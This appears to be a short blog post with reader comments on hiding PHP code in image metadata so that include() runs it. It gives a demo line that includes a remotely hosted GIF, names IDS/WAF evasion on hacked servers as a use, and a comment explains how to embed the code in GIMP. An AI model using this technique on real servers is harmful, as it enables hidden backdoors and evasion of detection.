As reported by the ISC, some people are using images to hide PHP code : if an image, contains PHP code, for example in the comment section, it may be included as an usual PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code in hacked servers and to bypass some IDS/WAF…
Here’s a demo: create a PHP file that would include this innocent image :
<?php
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>go to the previously created file’s URL, and voila :
Comment by Mathieu Dessus
4 May 23, 2011, 9:55 pm lock |
Have a look to allow_url_include directive: if poeple are not allowed to upload file on the server this will prevent remote file inclusion.
Comment by Andrei
3 May 23, 2011, 8:52 pm lock |
How can developers get rid of this scripts inside of uploaded images?
Comment by Mathieu Dessus
2 February 15, 2010, 5:25 pm lock |
Just open an image with your favorite image editor, and find where you can add a comment. In Gimp, select Image > Image properties
Comment by AccesInterzis
1 February 15, 2010, 5:08 pm lock |
Can you show how it can be added PHP code into an image?